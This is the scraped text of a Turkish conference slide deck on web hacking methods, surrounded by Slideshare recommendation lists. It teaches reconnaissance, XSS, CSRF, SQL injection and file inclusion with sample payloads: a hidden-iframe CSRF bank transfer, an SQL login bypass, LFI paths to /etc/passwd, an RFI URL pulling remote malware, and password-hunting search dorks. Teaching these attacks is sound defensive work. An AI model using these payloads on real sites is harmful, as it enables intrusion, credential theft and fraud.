ݺߣ

ݺߣShare a Scribd company logo

Web Guvenligi Konferansi - Web Hacking Yontemleri

Download as PPTX, PDF
E
EPICROUTERS

08 Eylül 2012 tarihinde Haliç Kongre ve Kültür Merkezi'nde gerçekleştirmiş olduğumuz "Web Saldırıları ve Web Güvenliği" konferansında "Web Hacking Yöntemleri" konu başlıklı sunumum.

1 of 32
Downloaded 131 times
Web Hacking Yöntemleri
• Bilgi Teknolojileri Güvenlik Danışmanı • White Hat Hacker • Ethical Hacking Eğitmeni • Blog Yazarı (www.eyupcelik.com.tr) • Web Güvenliği Editörü (www.webguvenligi.net) • LabSec Community - Güvenlik Ekip Lideri • Anatolia Security - Proje Takım Lideri • Güvenlik Araştırmacısı (Security Research) – PacketStormSecurity.org – Exploit-db.com – Secunia.com
• Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
www.whois.sc
www.intodns.com
Maltego
Web Guvenligi Konferansi - Web Hacking Yontemleri
Sık karşılaşılan hata kodları • 400 (Söz dizimi çözülemedi) • 403 (Yasak) • 404 (Bulunamadı) • 405 (Yönteme izin verilmiyor) • 500 (Dahili sunucu hatası) • 505 (HTTP sürümü desteklenmiyor)
• www.archive.org (Web Arşiv) • www.google.com • site: eyupcelik.com.tr • Filetype:txt • Password 123123 filetype:xml • Password 123123 filetype:xml site:site.com.tr • intitle:index.of • Intitle:index.of site:gov.tr • intitle:index.of pwd.db passwd site:com • Microsoft-IIS/5.0 server at • Apache/2.2 Server at • www.bing.com • IP: 192.168.1.100 • Kariyer Siteleri • (Kariyer.net, yenibiris.com. SecretCV)
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
• Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
• Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir saldırı türüdür. • PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür. • Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur. • Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda oturum bilgileri çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele geçirilebilir. • En çok karşılaşılan güvenlik zafiyetidir!
• XSS • Reflected XSS Attack • Stored (Persistent) XSS Attack
• URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür. • En çok karşılaşılan XSS saldırı türevidir. • Kullanıcı taraflı çalışır. • Phishing saldırılarına zemin oluşturur.
• Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür. • XSS kodları database sunucusuna kaydedilir. • Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet eder.
• XSS saldırısına benzer • Web uygulamasının oturum zaman aşımlarını kullanmamasından kaynaklanır. • XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır. • Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya işlemler yaptırılır. • Banka hesaplarından para transferi, uygulama yetki yükseltme saldırıları gibi bir çok işlem bu saldırı yöntemi ile yapılabilmektedir. • Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir kullanıcıya yaptırmaktır. • Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen hesaba para transfer etmesini sağlamaktaydı.
• Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor • Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500 &submit=1 kodu çalıştırılır. • Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe> tagları arasına yerleştirir. • Bu tagler kullanıcının görmemesi için <img src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde yada <iframe src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde olacaktır. • Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın hesabından Ismail adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
• Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
• Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘) eklenerek yetkisiz sorgulamalar yapılmasıdır. • SQL injection yöntemi ile sql sunucusunda bulunan verilere erişilebilir, değiştirilebilir , silinebilir • SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi. • Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü • SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar ‚string‛ olarak kabul edilir. • Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input değerler kontrol edilirken sql cümlecikleri kullanılır. • SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’ • Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda ‚eyup‛ varsa ve sifre kolonıundaki şifresi de eğer ‚x9x9‛ ise kullanıcı oturum açmış olacaktır. • Kullanıcının form alanına girmiş olduğu input veriler where koşuluna atanmaktadır.
• Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır. • Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’ • Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları istemiş olduk.
• ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya yarayan bir araçtır. • Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak gerçekleştirir. • Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak verilere erişmeye çalışır. • Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
• SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan bir saldırı yöntemidir. • Bu yöntem alınan hataların True veya False kısmı ile ilgilenir. • SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize geri döndürür. • Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
• Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
• Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • index.php?SayfaAc=iletisim.php • index.php?SayfaAc=../../configuration.php • index.php?SayfaAc=../../../../etc/passwd • index.php?SayfaAc=../../../boot.ini
• Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • RFI saldırılarında en büyük etken değişkene değer atanmamasıdır! • Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması ile oluşur. • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • include($deger‛.php‛) • index.php?deger=http://www.site.com/malware.txt
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri

Recommended

Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliğiBilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
EPICROUTERS
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
EPICROUTERS
Bilge adam beşiktas şube ceh 1. introduction
Bilge adam beşiktas şube ceh 1. introductionBilge adam beşiktas şube ceh 1. introduction
Bilge adam beşiktas şube ceh 1. introduction
EPICROUTERS
Web Güvenlik Açıkları ve Kullanımı (Geniş Anlatım)
Web Güvenlik Açıkları ve Kullanımı (Geniş Anlatım)Web Güvenlik Açıkları ve Kullanımı (Geniş Anlatım)
Web Güvenlik Açıkları ve Kullanımı (Geniş Anlatım)
Mehmet Kelepçe
Web Uygulama Güvenliği
Web Uygulama GüvenliğiWeb Uygulama Güvenliği
Web Uygulama Güvenliği
Mesut Güngör
Owasp top ten 2017
Owasp top ten 2017Owasp top ten 2017
Owasp top ten 2017
YEmreASLAN
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıBeyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
PRISMA CSI
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
canyoupwn.me
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
PRISMA CSI
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
CypSec - Siber Güvenlik Konferansı
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PRISMA CSI
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
PRISMA CSI
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
CypSec - Siber Güvenlik Konferansı
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
BGA Cyber Security
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma Yöntemleri
Talha Kabakus
Hackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiHackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi Güvenliği
BGA Cyber Security
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
PRISMA CSI
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılar
Alper Başaran
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeWeb Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Erkan Başavcı
Hacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıHacking Uygulamaları ve Araçları
Hacking Uygulamaları ve Araçları
Mustafa
WannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıWannaCry - NotPetya Olayları
WannaCry - NotPetya Olayları
Alper Başaran
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
BGA Cyber Security
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
BGA Cyber Security
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
fangjiafu
Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)
Mehmet Ince
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale EgitimiBTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
BGA Cyber Security
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
BGA Cyber Security
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
BGA Cyber Security

More Related Content

What's hot (19)

Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
PRISMA CSI
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
CypSec - Siber Güvenlik Konferansı
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PRISMA CSI
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
PRISMA CSI
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
CypSec - Siber Güvenlik Konferansı
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
BGA Cyber Security
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma Yöntemleri
Talha Kabakus
Hackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiHackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi Güvenliği
BGA Cyber Security
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
PRISMA CSI
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılar
Alper Başaran
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeWeb Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Erkan Başavcı
Hacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıHacking Uygulamaları ve Araçları
Hacking Uygulamaları ve Araçları
Mustafa
WannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıWannaCry - NotPetya Olayları
WannaCry - NotPetya Olayları
Alper Başaran
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
BGA Cyber Security
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
BGA Cyber Security
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
fangjiafu
Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)
Mehmet Ince
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale EgitimiBTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
PRISMA CSI
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
CypSec - Siber Güvenlik Konferansı
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PRISMA CSI
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
PRISMA CSI
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
CypSec - Siber Güvenlik Konferansı
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
BGA Cyber Security
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma Yöntemleri
Talha Kabakus
Hackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiHackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi Güvenliği
BGA Cyber Security
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
PRISMA CSI
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılar
Alper Başaran
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeWeb Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Erkan Başavcı
Hacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıHacking Uygulamaları ve Araçları
Hacking Uygulamaları ve Araçları
Mustafa
WannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıWannaCry - NotPetya Olayları
WannaCry - NotPetya Olayları
Alper Başaran
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
BGA Cyber Security
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
BGA Cyber Security
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
fangjiafu
Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)
Mehmet Ince
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale EgitimiBTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri

Viewers also liked (17)

SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
BGA Cyber Security
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
BGA Cyber Security
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
BGA Cyber Security
Bilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2 hackingBilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2 hacking
EPICROUTERS
Atilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunumAtilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunum
EPICROUTERS
x86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikx86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislik
canyoupwn.me
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Mehmet Caner Köroğlu
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleriİnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
BGA Cyber Security
Siber Dünyada Modern Arka Kapılar
